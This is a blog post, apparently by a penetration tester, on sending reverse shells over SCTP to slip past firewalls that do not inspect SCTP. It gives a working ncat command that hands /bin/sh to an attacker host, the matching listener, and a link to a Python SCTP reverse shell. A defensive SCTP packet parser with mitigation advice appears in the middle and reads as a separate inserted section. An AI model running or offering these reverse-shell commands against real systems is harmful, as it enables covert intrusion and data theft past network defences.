So, over the last while I was looking at “Interesting” ways to throw back a reverse shell and remain under the radar a little bit. UDP, TCP and ICMP reverse shells have been done to death (heck, you can even use DNS tunneling), so I had the daft idea to try SCTP.
I noticed while testing it that many rubbish “Security in a box” firewalls do not actually parse SCTP packets at all, and just let them zip right through the firewall without checking their contents. So it looked like a perfect candidate for data exfiltration, spawning reverse shells, and other such mischief.
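The observation above (a firewall that only understands TCP and UDP passes SCTP untouched) is easy to test for on the defensive side. The following is an added example, not code from the original post: a small Python parser that picks IP protocol 132 (SCTP) out of raw IPv4 packets, reads the SCTP common header and the chunk types after it, and flags association setup (an INIT chunk) to any destination port not on an allow-list. The packets, addresses and ports in it are constructed for the demonstration; the hypothetical allow-list of port 3868 stands in for whatever SCTP services (Diameter, SIGTRAN) a network legitimately runs.

```python
"""Minimal IPv4/SCTP header parser for spotting SCTP traffic that a
TCP/UDP-only firewall would have passed without inspection.
Added example; not code from the original post. All sample packets
below are constructed by hand, not captured traffic."""
import struct
from typing import Optional, Tuple

IPPROTO_SCTP = 132  # IANA-assigned IP protocol number for SCTP

# SCTP chunk types, RFC 4960 section 3.2 (subset)
CHUNK_NAMES = {0: "DATA", 1: "INIT", 2: "INIT_ACK", 3: "SACK", 4: "HEARTBEAT",
               5: "HEARTBEAT_ACK", 6: "ABORT", 7: "SHUTDOWN",
               8: "SHUTDOWN_ACK", 9: "ERROR", 10: "COOKIE_ECHO", 11: "COOKIE_ACK"}


def parse_ipv4(pkt: bytes) -> Tuple[int, str, str, bytes]:
    """Return (protocol, src, dst, payload) from a raw IPv4 packet."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    if pkt[0] >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    proto = pkt[9]
    src = ".".join(str(b) for b in pkt[12:16])
    dst = ".".join(str(b) for b in pkt[16:20])
    return proto, src, dst, pkt[ihl:total_len]


def parse_sctp(payload: bytes) -> dict:
    """Parse the 12-byte SCTP common header and list the chunk types that follow."""
    if len(payload) < 12:
        raise ValueError("truncated SCTP common header")
    sport, dport, vtag, csum = struct.unpack("!HHII", payload[:12])
    chunks = []
    off = 12
    while off + 4 <= len(payload):
        ctype, _flags, clen = struct.unpack("!BBH", payload[off:off + 4])
        if clen < 4:
            raise ValueError("bad chunk length")
        chunks.append(CHUNK_NAMES.get(ctype, f"UNKNOWN({ctype})"))
        off += (clen + 3) & ~3  # chunks are padded to 4-byte boundaries
    return {"sport": sport, "dport": dport, "vtag": vtag,
            "checksum": csum, "chunks": chunks}


def inspect_packet(pkt: bytes, allowed_sctp_ports=frozenset()) -> Optional[str]:
    """Return an alert string if the packet is SCTP to a non-allowed port, else None."""
    proto, src, dst, payload = parse_ipv4(pkt)
    if proto != IPPROTO_SCTP:
        return None
    hdr = parse_sctp(payload)
    if hdr["dport"] in allowed_sctp_ports:
        return None
    # INIT opens an association, so an INIT toward an unexpected destination
    # is the SCTP counterpart of a new outbound TCP SYN.
    if "INIT" in hdr["chunks"]:
        return f"sctp-init {src}:{hdr['sport']} -> {dst}:{hdr['dport']}"
    return f"sctp-other {src}:{hdr['sport']} -> {dst}:{hdr['dport']} chunks={hdr['chunks']}"


# --- constructed sample data (not real captures) ---------------------------

def build_ipv4(proto: int, src: str, dst: str, payload: bytes) -> bytes:
    """Construct a minimal IPv4 packet (no options, header checksum left zero)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      bytes(int(o) for o in src.split(".")),
                      bytes(int(o) for o in dst.split(".")))
    return hdr + payload


def build_sctp(sport: int, dport: int, chunks: bytes) -> bytes:
    """Construct an SCTP common header (vtag and CRC32c left zero) plus chunks."""
    return struct.pack("!HHII", sport, dport, 0, 0) + chunks


# INIT chunk: type 1, flags 0, length 20, init tag, a_rwnd, out/in streams, initial TSN
INIT_CHUNK = struct.pack("!BBHIIHHI", 1, 0, 20, 0xDEADBEEF, 65535, 10, 10, 1)
# DATA chunk: type 0, flags 3 (B|E), length 16 + data, TSN, stream, seq, PPID, then data
_data = b"hi\n"
DATA_CHUNK = struct.pack("!BBHIHHI", 0, 3, 16 + len(_data), 1, 0, 0, 0) + _data
DATA_CHUNK += b"\0" * (-len(DATA_CHUNK) % 4)  # pad to 4-byte boundary

SAMPLE_PACKETS = [
    build_ipv4(IPPROTO_SCTP, "10.0.0.5", "203.0.113.10", build_sctp(4444, 4444, INIT_CHUNK)),
    build_ipv4(6, "10.0.0.5", "203.0.113.10", b"\x11\x5c\x00\x50" + b"\0" * 16),  # plain TCP
    build_ipv4(IPPROTO_SCTP, "10.0.0.7", "10.0.1.2", build_sctp(40000, 3868, DATA_CHUNK)),
]

if __name__ == "__main__":
    for p in SAMPLE_PACKETS:
        print(inspect_packet(p, allowed_sctp_ports={3868}))
```

The point of the parser is the one a firewall or IDS must get right: matching on the IP protocol number rather than assuming everything is TCP or UDP. On Linux hosts that never legitimately use SCTP, the simpler mitigation is to not load the sctp module at all and to drop the protocol at the edge (iptables accepts `-p sctp`), which removes the channel instead of trying to inspect it.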
Anyway, at first I tested the idea out using ncat (from nmap), which features SCTP support and is basically a full replacement for netcat.
NOTE: SCTP support should be enabled by default on Linux. If it ain't, run “modprobe sctp” and see whether it works then. I found that OpenVZ virtual machines tend not to have SCTP support, depending on whether it is supported on the host.
With ncat, doing the following is enough to deliver a reverse shell over SCTP.
rootedbox:~# ncat --sctp -c /bin/sh attackerip port
attacker:~# ncat --sctp -l -v -p port
Screenshot of this:
So, we can do it with ncat, however I wanted to see how hard it would be to implement this in python.
Luckily, there is a Python module for making SCTP connections – pysctp. It behaves very similarly to the socket module.
After a bit of playing around, I managed to implement a reverse shell over SCTP in Python, which you can find here: http://packetstorm.igor.onlinedirect.bg/UNIX/penetration/rootkits/sctp_reverse.py.txt
Further development includes implementing SSL – it works, but tends to randomly die because Python's SSL library is rubbish – and writing these payloads in a native language (C) as opposed to Python. Lots more to do here!